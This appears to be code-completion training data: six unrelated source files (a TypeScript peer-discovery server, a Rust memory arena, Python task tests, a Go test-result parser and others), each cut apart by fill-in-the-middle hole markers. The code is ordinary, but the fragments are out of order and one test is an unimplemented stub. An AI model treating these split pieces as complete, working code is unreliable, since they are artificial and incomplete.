JSON.parse(fs.readFileSync(myServicesFilename)); this.peerServices = CBuffer(this.maxPeerServices); this.readRemoteServicesFromFile(); this.getMyIp().then(()=>{ if(!this.amISeed()) { this.addPeerService({"name":"peer-up","version":"1.0.0","url":seedUrl}); this.onTimeToCheckForServices(); } }).catch((err)=>{ console.log(err); process.exit(-1); }); } amISeed():boolean { return (seedUrl.indexOf(this.myIp)!=-1); } serviceInterval; maxPeerServices; peerUpPort; myServices; peerServices; server; myIp:string; listen() { this.server.listen(this.peerUpPort, ()=>{ console.log('%s listening at %s', this.server.name, this.server.url); }); this.installServiceInterval(); } onPost(req, res, next) { // let remote = req.headers['x-forwarded-for'] || req.connection.remoteAddress; //console.log("from ip "+req.connection.remoteAddress); //console.log("received post:\n"+JSON.stringify(req.params)); if(req.params[postPeerUpKey]) { this.addPeerUpFromIncomingPost(req.params[postPeerUpKey]); } const selection = this.createSelectionByName(req.params); Server.pushRandomly(selection, req.params); res.send(req.params); return next(); }; static pushRandomly(selection, params) { let max = params.max ? params.max : 1; params.services = []; for(let i=0; i<max; i++) { let index=random.integer(0,selection.length-1); params.services.push(selection[index]); } } createSelectionByName(params):any { let selection = []; this.myServices.services.forEach(function(entry) { if(params.service && entry.name != params.service) return; selection.push(entry); }); this.peerServices.forEach(function(entry){ if(params.service && entry.name != params.service) return; selection.push(entry); }); return selection; } addPeerUpFromIncomingPost(peerUpUrl:string) { let remotePeerUp = { name:'peer-up', version:'1.0.0', url:peerUpUrl }; if(this.isKnownPeerService(remotePeerUp)) return; this.addPeerService(remotePeerUp); this.writePeerServiceToFile(); } writePeerServiceToFile() { fs.writeFileSync(peerServicesFilename, JSON.stringify(this.peerServices.toArray())); } readRemoteServicesFromFile() { if(!fs.existsSync(remoteServicesFilename)) return; const remotes = JSON.parse(fs.readFileSync(remoteServicesFilename)); remotes.forEach((entry)=>{ this.peerServices.push(entry); }); } installServiceInterval() { setInterval(()=>{this.onTimeToCheckForServices()}, this.serviceInterval); } onTimeToCheckForServices() { let peers = []; this.peerServices.forEach((entry)=>{ if(entry.name!="peer-up") return; peers.push(entry); });<|fim▁hole|> if(peers.length==0) return; const selected = peers.length==1 ? 0 : random.integer(0,peers.length-1); this.checkPeerUpService(peers[selected].url); } checkPeerUpService(peerUrl:string) { const client = clients.createJsonClient({ url: peerUrl, version: '~1.0' }); try { client.post('/peer-up', {max:'3',[postPeerUpKey]:this.getMyPeerUpUrl()}, (err, req, res, obj)=> { if(!obj) return; if(!obj.services) return; //console.log("peer server <"+peerUrl+"> returned obj: %j", obj); if(obj.services.constructor !== Array) return; if(obj.services.length==0) return; obj.services.forEach((entry)=>{ this.addPeerService(entry); }); this.writePeerServiceToFile(); }); }catch(error) { console.log("peer:"+peerUrl); console.log(""+error); } } getMyPeerUpUrl():string { return "http://"+this.myIp+":"+this.peerUpPort; } addPeerService(service) { if(service.url.indexOf("127.0.0.1")!=-1) return; if(service.url.indexOf("localhost")!=-1) return; if(service.url.length==0) return; if(service.name.length==0) return; if((service.name!=="peer-up") && this.amISeed()) return; if(this.isMyService(service)) return; if(this.isKnownPeerService(service)) return; this.peerServices.push(service); //console.log("added new peer service: "+JSON.stringify(service)); } isKnownPeerService(service):boolean { let found=false; this.peerServices.forEach(function(entry) { if(service.url!==entry.url) return; if(service.name!==entry.name) return; //todo: version check found=true; }); return found; } isMyService(service):boolean { if(service.url===this.getMyPeerUpUrl()) return true; let found=false; this.myServices.services.forEach(function(entry){ if(service.url!==entry.url) return; if(service.name!==entry.name) return; //todo: version check found=true; }); return found; } getMyIp():Promise<any> { return new Promise((resolve, reject)=>{ const ipfyClient = clients.createJsonClient({url: 'https://api.ipify.org?format=json'}); ipfyClient.get('', (err, req, res, obj) => { if(err) { reject(err); } console.log('ipfy: %j', obj); this.myIp = obj.ip; resolve(); }); }); } } const remoteServicesFilename:string = "remote-services.json";<|fim▁end|>
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|><|fim▁end|>
# See the License for the specific language governing permissions and # limitations under the License.
<|file_name|>memory_arena.rs<|end_file_name|><|fim▁begin|>//! 32-bits Memory arena for types implementing `Copy`. //! This Memory arena has been implemented to fit the use of tantivy's indexer //! and has *twisted specifications*. //! //! - It works on stable rust. //! - One can get an accurate figure of the memory usage of the arena. //! - Allocation are very cheap. //! - Allocation happening consecutively are very likely to have great locality. //! - Addresses (`Addr`) are 32bits. //! - Dropping the whole `MemoryArena` is cheap. //! //! # Limitations //! //! - Your object shall not implement `Drop`. //! - `Addr` to the `Arena` are 32-bits. The maximum capacity of the arena //! is 4GB. *(Tantivy's indexer uses one arena per indexing thread.)* //! - The arena only works for objects much smaller than `1MB`. //! Allocating more than `1MB` at a time will result in a panic, //! and allocating a lot of large object (> 500KB) will result in a fragmentation. //! - Your objects are store in an unaligned fashion. For this reason, //! the API does not let you access them as references. //! //! Instead, you store and access your data via `.write(...)` and `.read(...)`, which under the hood //! stores your object using `ptr::write_unaligned` and `ptr::read_unaligned`. use std::mem; use std::ptr; const NUM_BITS_PAGE_ADDR: usize = 20; const PAGE_SIZE: usize = 1 << NUM_BITS_PAGE_ADDR; // pages are 1 MB large /// Represents a pointer into the `MemoryArena` /// . /// Pointer are 32-bits and are split into /// two parts. /// /// The first 12 bits represent the id of a /// page of memory. /// /// The last 20 bits are an address within this page of memory. #[derive(Copy, Clone, Debug)] pub struct Addr(u32); impl Addr { /// Creates a null pointer. pub fn null_pointer() -> Addr { Addr(u32::max_value()) } /// Returns the `Addr` object for `addr + offset`<|fim▁hole|> pub fn offset(self, offset: u32) -> Addr { Addr(self.0.wrapping_add(offset)) } fn new(page_id: usize, local_addr: usize) -> Addr { Addr((page_id << NUM_BITS_PAGE_ADDR | local_addr) as u32) } fn page_id(self) -> usize { (self.0 as usize) >> NUM_BITS_PAGE_ADDR } fn page_local_addr(self) -> usize { (self.0 as usize) & (PAGE_SIZE - 1) } /// Returns true if and only if the `Addr` is null. pub fn is_null(self) -> bool { self.0 == u32::max_value() } } pub fn store<Item: Copy + 'static>(dest: &mut [u8], val: Item) { assert_eq!(dest.len(), std::mem::size_of::<Item>()); unsafe { ptr::write_unaligned(dest.as_mut_ptr() as *mut Item, val); } } pub fn load<Item: Copy + 'static>(data: &[u8]) -> Item { assert_eq!(data.len(), std::mem::size_of::<Item>()); unsafe { ptr::read_unaligned(data.as_ptr() as *const Item) } } /// The `MemoryArena` pub struct MemoryArena { pages: Vec<Page>, } impl MemoryArena { /// Creates a new memory arena. pub fn new() -> MemoryArena { let first_page = Page::new(0); MemoryArena { pages: vec![first_page], } } fn add_page(&mut self) -> &mut Page { let new_page_id = self.pages.len(); self.pages.push(Page::new(new_page_id)); &mut self.pages[new_page_id] } /// Returns an estimate in number of bytes /// of resident memory consumed by the `MemoryArena`. /// /// Internally, it counts a number of `1MB` pages /// and therefore delivers an upperbound. pub fn mem_usage(&self) -> usize { self.pages.len() * PAGE_SIZE } pub fn write_at<Item: Copy + 'static>(&mut self, addr: Addr, val: Item) { let dest = self.slice_mut(addr, std::mem::size_of::<Item>()); store(dest, val); } /// Read an item in the heap at the given `address`. /// /// # Panics /// /// If the address is erroneous pub fn read<Item: Copy + 'static>(&self, addr: Addr) -> Item { load(self.slice(addr, mem::size_of::<Item>())) } pub fn slice(&self, addr: Addr, len: usize) -> &[u8] { self.pages[addr.page_id()].slice(addr.page_local_addr(), len) } pub fn slice_from(&self, addr: Addr) -> &[u8] { self.pages[addr.page_id()].slice_from(addr.page_local_addr()) } #[inline(always)] pub fn slice_mut(&mut self, addr: Addr, len: usize) -> &mut [u8] { self.pages[addr.page_id()].slice_mut(addr.page_local_addr(), len) } /// Allocates `len` bytes and returns the allocated address. pub fn allocate_space(&mut self, len: usize) -> Addr { let page_id = self.pages.len() - 1; if let Some(addr) = self.pages[page_id].allocate_space(len) { return addr; } self.add_page().allocate_space(len).unwrap() } } struct Page { page_id: usize, len: usize, data: Box<[u8]>, } impl Page { fn new(page_id: usize) -> Page { Page { page_id, len: 0, data: vec![0u8; PAGE_SIZE].into_boxed_slice(), } } #[inline(always)] fn is_available(&self, len: usize) -> bool { len + self.len <= PAGE_SIZE } fn slice(&self, local_addr: usize, len: usize) -> &[u8] { &self.slice_from(local_addr)[..len] } fn slice_from(&self, local_addr: usize) -> &[u8] { &self.data[local_addr..] } fn slice_mut(&mut self, local_addr: usize, len: usize) -> &mut [u8] { &mut self.data[local_addr..][..len] } fn allocate_space(&mut self, len: usize) -> Option<Addr> { if self.is_available(len) { let addr = Addr::new(self.page_id, self.len); self.len += len; Some(addr) } else { None } } } #[cfg(test)] mod tests { use super::MemoryArena; #[test] fn test_arena_allocate_slice() { let mut arena = MemoryArena::new(); let a = b"hello"; let b = b"happy tax payer"; let addr_a = arena.allocate_space(a.len()); arena.slice_mut(addr_a, a.len()).copy_from_slice(a); let addr_b = arena.allocate_space(b.len()); arena.slice_mut(addr_b, b.len()).copy_from_slice(b); assert_eq!(arena.slice(addr_a, a.len()), a); assert_eq!(arena.slice(addr_b, b.len()), b); } #[derive(Clone, Copy, Debug, Eq, PartialEq)] struct MyTest { pub a: usize, pub b: u8, pub c: u32, } #[test] fn test_store_object() { let mut arena = MemoryArena::new(); let a = MyTest { a: 143, b: 21, c: 32, }; let b = MyTest { a: 113, b: 221, c: 12, }; let num_bytes = std::mem::size_of::<MyTest>(); let addr_a = arena.allocate_space(num_bytes); arena.write_at(addr_a, a); let addr_b = arena.allocate_space(num_bytes); arena.write_at(addr_b, b); assert_eq!(arena.read::<MyTest>(addr_a), a); assert_eq!(arena.read::<MyTest>(addr_b), b); } }<|fim▁end|>
<|file_name|>test_task_exceptions.py<|end_file_name|><|fim▁begin|>from unittest import TestCase from PyProjManCore.task import Task class TestTaskOperationsExceptions(TestCase): """Test Exceptions for Task operations""" def test_append_duplicate_prereq(self): """Test appending duplicate prerequisites to a task, it should be unique""" root = Task("Root Task") parent = Task("Parent Task") root.append_prerequisite(parent) root.append_prerequisite(parent) self.assertNotEqual(2, len(root.prerequisites)) def test_cyclic_dependency(self): """ Test case of a cyclic dependency, i.e. a Task depends on itself, or a task has both prerequisite and child the same """ self.fail("Not implemented ") def test_append_duplicate_dep(self): """Test appending duplicate dependants to a task, it should be unique""" root = Task("Root Task") child = Task("Child Task") root.append_dependant(child) root.append_dependant(child)<|fim▁hole|><|fim▁end|>
self.assertNotEqual(2, len(root.dependants))
<|file_name|>style.ts<|end_file_name|><|fim▁begin|>import styled, { css } from 'styled-components'; import { ITheme } from '~/interfaces'; export const EmptySection = styled.div` margin-top: 16px; padding: 8px 0px 8px 0px; overflow: hidden; border-radius: 8px; <|fim▁hole|> ${({ theme }: { theme?: ITheme }) => css` background-color: ${theme['pages.lightForeground'] ? 'rgba(255, 255, 255, 0.05)' : '#fafafa'}; `}; `; export const SectionTitle = styled.div` font-size: 16px; padding: 16px 24px; font-weight: 500; `;<|fim▁end|>
&:first-child { margin-top: 0; }
<|file_name|>summary.go<|end_file_name|><|fim▁begin|>package lib import ( "io" "strings" "github.com/improbable-io/go-junit-report/parser" "io/ioutil" ) type Results map[string][]*Test const ( PASS = "pass" FAIL = "fail" SKIP = "skip" ) var jsonTestKeys = map[parser.Result]string{ parser.PASS: PASS, parser.FAIL: FAIL, parser.SKIP: SKIP, } type Test struct { PackageName string `json:"package_name"` TestName string `json:"test_name"` Time int `json:"time"` Output string `json:"output"` } type TestSummary struct { TotalTests int `json:"total_tests"` BuildErrors string `json:"build_errors"` Results Results `json:"results"` } func Parse(stdoutReader io.Reader, stderrReader io.Reader) (*TestSummary, error) { results := Results{ PASS: []*Test{}, FAIL: []*Test{}, SKIP: []*Test{}, } res, err := parser.Parse(stdoutReader, "") if err != nil { return nil, err } totalTests := 0 for _, pkg := range res.Packages { for _, t := range pkg.Tests { key, _ := jsonTestKeys[t.Result] <|fim▁hole|> TestName: t.Name, Time: t.Time, Output: strings.Join(t.Output, "\n"), } results[key] = append(results[key], jsonTest) totalTests += 1 } } buildErrorBytes, err := ioutil.ReadAll(stderrReader) if err != nil { return nil, err } summary := &TestSummary{ TotalTests: totalTests, Results: results, BuildErrors: string(buildErrorBytes), } return summary, nil }<|fim▁end|>
jsonTest := &Test{ PackageName: pkg.Name,